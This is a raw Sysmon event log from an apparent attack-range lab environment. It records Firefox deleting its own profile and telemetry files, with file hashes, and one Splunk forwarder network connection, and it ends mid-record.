- insufficient disk space 23542300x800000000000000048127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.626{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1EC6C317D532C916E90698DDE717B396,SHA256=6390DB9F9A61EF5212DD0D62B16D9B1C0242FBD7B042E3D775D9E3650CCFDFA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.624{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=485E4EBBD3E03B9EB85117D0F86FB6CE,SHA256=A80D553C5AB1BFD6228C9B8DE1FCBC710AB1EEBF8ABBA0770944B7C79E6DC779,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.623{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=E7BEBA636E2E6DECA2532F1B2A091F77,SHA256=C3DABA7FDFA4ED40AE90A06E15B4AA48D303DA2692BFF781435E04499B13B347,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.622{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A96DBF6B45FA07E49056AE50B68A6C4B,SHA256=D2AA0430E4242F1227F6AD30BA17C4D72B56F38C97F016DE4198D2076C78C4C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.621{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=AAE05D7534928502CA5DA325253A4DD5,SHA256=C567C845E82450A399C5B18D465FAF97CED4BB420B2A743F915BFFAAA7E75A6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.620{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=79903D5679B6D50AE4227690F7235E37,SHA256=46C01381C096E87F7E24CD64342DC0275B7323D07D8740B9AFF526A162F0DCD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.618{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=5FD9F04DAAA20F95AE58544E73FE8D20,SHA256=6D66A781536B6275C6399C6970F318738CD23FFCF063934E2666ED119915CB36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.617{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=AE1C9A91B8E878AEE46B0EBDA9D95D8B,SHA256=D58A8A61DD833AD4DEE13A566EF9ED7AC8A17E04138F8B86847C346029420BE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.616{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=DD586431C28139E5371DEB6B9EEF48A5,SHA256=3690A51F38D532B86D8CF0FD8621C58CB5E6033022BA8106524F7624336D8635,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.615{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=679E7AE372152FCA532DD75F533E6CB4,SHA256=5F0F315E5BC58A4F3D4E5168C3253ADE71F2AB8E2B6E50E985F31D05533199B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.614{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=C6EC21A3B23D01A6D135CB7CFA0E6C32,SHA256=81E6C1731EF34B6C3DF741EE5B4E0AACD0BCCB0D4E9422A7A9ED04CE67F23D3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.612{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=FB8413B4B4B47D9255D59E83198B0EF2,SHA256=30E22EBE385799A438AD1C28FDEA580392A61F30A7D59835A818289D177F0AED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.610{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=441A0DB46FB49BC59FD36606D33239D0,SHA256=709728F653BE0F6C60C990135A968EC3BA66DA3B3B5C38CA700CB8943360EC31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.609{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A977A2DDBAAAA528C9867291A346E9D4,SHA256=088281BE11AB231769180C9BA376CB7A9E7B88FD595765C66E514E8F6A001F49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.608{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=652EAE1F11131FD90F9C89FCAC8FE812,SHA256=3366C9E95BD59388A1D728D49BD577227942B644FB447C79D18BA8459D876E45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.607{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=223EE3F30A69B8E39C5D0574B8599F38,SHA256=A10EBF1E58BDEF55E4401DCADF695F4E3093BD666C137A9B3B6412C78C99B367,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.606{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=2419914119CBCED574DF28C0FB4A7F10,SHA256=F4C8CFDB715460C4F29A385B22F214BE7678B34EF9196A298D8601FFD0ECCDBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.605{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=AEF4ABA0453C6AD42C0407D594488E86,SHA256=8341D96FE7AEF109DFC342869A961CC091750A5B612A001268B6E53E4E408C55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.604{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=D553EED6CFB2D7254D7092696B25C24F,SHA256=AECBCABAFF1EA11B5E7827C775818267592029F01A7B4ABA6731442EC4E7882E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.600{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=584DBCB93F9D36CEDC066E302E233C4B,SHA256=581987B80B9D46F6BD8D7E34784C86DD784158C15A1E84410F60D72C1B2D8F5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.599{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\protections.sqlite-journalMD5=8B360E425472FCA3E0FFE998E29F9994,SHA256=4B093485AE5E1CEA7E73E3CC133B9B69A334865A8D20445F0416DF07125893A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.599{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A3921FFDD036A8309B061E62D844F5B2,SHA256=91272CCEC0BC44A720820FA389661AC9AF8B08B1759A5603C7A2E379A085D380,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018893Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:36.028{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50197-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000048105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.598{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=E211AF73A010185DAF580DD33CC935C0,SHA256=1C17E3DD0C301DE8A19AF0A778F79664478ACFAB31523B34300FF04A03576CFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.596{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F8EA8AA879C01FA69DE7F9B95EBE931D,SHA256=FB8345969AE945A340A7B43AD1429FC6E91F449E734C37D30C33D78388595C6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.595{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=EB57C01984DB7BCEED546B55F1B9D816,SHA256=7586268839079F9702C9926CD5851D9F1A208397142FD731B92A953A1BB12FB2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.592{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=708F2D0A65B8307992A3A1DAD9A08A75,SHA256=652C8EC2764AE18012843253F4C4C8669AF92C4989B632549A3E23B48C542B93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.591{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A83938F4A91F53DFD98C13E5965C9FB5,SHA256=3AF41FDCD2C69EF445FAD622206CFD08038E9485BA3F9BBEA4930D1996A0CA3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.590{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1CF69C3CC059489350589DE4D6A2462E,SHA256=753ED16B1AB1D16B5B5E03AFCACF2F710A109CDEF8A289B3EBEC07CF91307DD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.589{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=ADD8AD45447DC107780D141BB8B5CC91,SHA256=AF5503EE4762AEE707AD5E4F66BA5E7F94AC11E5D22E8B551858CBD52AFD10ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.588{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=D94F4D00D61FB8BF0283709DD642B110,SHA256=6603821B1BCA30899ED3BFEB49A9ABD6BA08740B2C395006BEDD1D2561479FC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.586{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=FFE1E481115A1BD211982475073A8D39,SHA256=20B7BF06DDA531BDAB2911B1CB7DA945EA08589855B8578725383FAADBD2E7B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.585{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=713CEA70963E06938A8F417713936CAB,SHA256=B9CA20F222D690B0D14EBE8912FD879259887D2C7C27A771A9030C1724D3706F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.584{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=FA3A369CB7326EC0B881B54FBFA8F7B1,SHA256=338DA6DBACF6B93CDD1C77073A29D919E378BA705B8C5884B127301EEE26AB3F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.583{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1A71981FE89DEDA25DBF7925EC190CC2,SHA256=225E651C5C791851B2148632EB89AFFD264EC9BCA090DF520DA02E6B742C2605,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.581{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=CAA367DBFE90E7B0DA353572CF8E77A6,SHA256=6BC4D9F841EC367E8D812AC8DA002A3E96F3DC18A36E9019B6EDF541066CE834,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.580{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=37DCC5411E22357D4F23278498F37773,SHA256=E468FF7965818DB2F1870E3A604EC429B9B1FCFAF5702AD1232C50DBB081041A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.579{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=B1F0C569DAAFB9DD7DCFB8D43A0D951A,SHA256=CB9123A5E2556AF9E57C5157E4C2E7BB07311AD3D1B0CB55EEBED79D2E1B2189,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.578{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=37EAE2132EEF779AAF25E72179438C73,SHA256=B22CB049658B861CA4152A7D218E443BA3909E1D1B2B206E77A41020BEFCE4AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.576{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=CBFD328873DEADCCEAFE8293E521B12E,SHA256=1DF8123C690FAB81F8A9E547B3FE5517F367C36A0B1E0F9FE3FAB41B1F7B2EC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.575{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=26B75ACF4EBF7562FCE6397CE1EDE2F5,SHA256=07982B2BC876383091CBDF4F382D05D0C3B473586EFDEAC2C3CFCB198CCDD16A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.574{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=581A27A8E03680FB9B3306AC752558CF,SHA256=0E81D4E5BD74ADFCE6E48A141C457174AF7DDD3CFCC559EC0B74FFF64DED4589,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.573{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=8A219314A012D4CF04B3D49CFEC256A9,SHA256=0943C1587FA2278AC16828BFBE315758E298A361E8906A857D15CA613C025E37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.571{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=9412C758B0400EE5281B05E7BCA0ACC4,SHA256=4A750F871743BE7478ACD5296BDF94D02BF92FC853DB1F6F951C235456DB3229,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.569{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=B579A0BCAF0132DA3AFF1AFA0BE88343,SHA256=DE5B25E866FD1BDB7C03DE1ACC92E1124E58E481EB38E47C3828A2A88BE6EBF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.543{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.529{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.514{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.491{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program 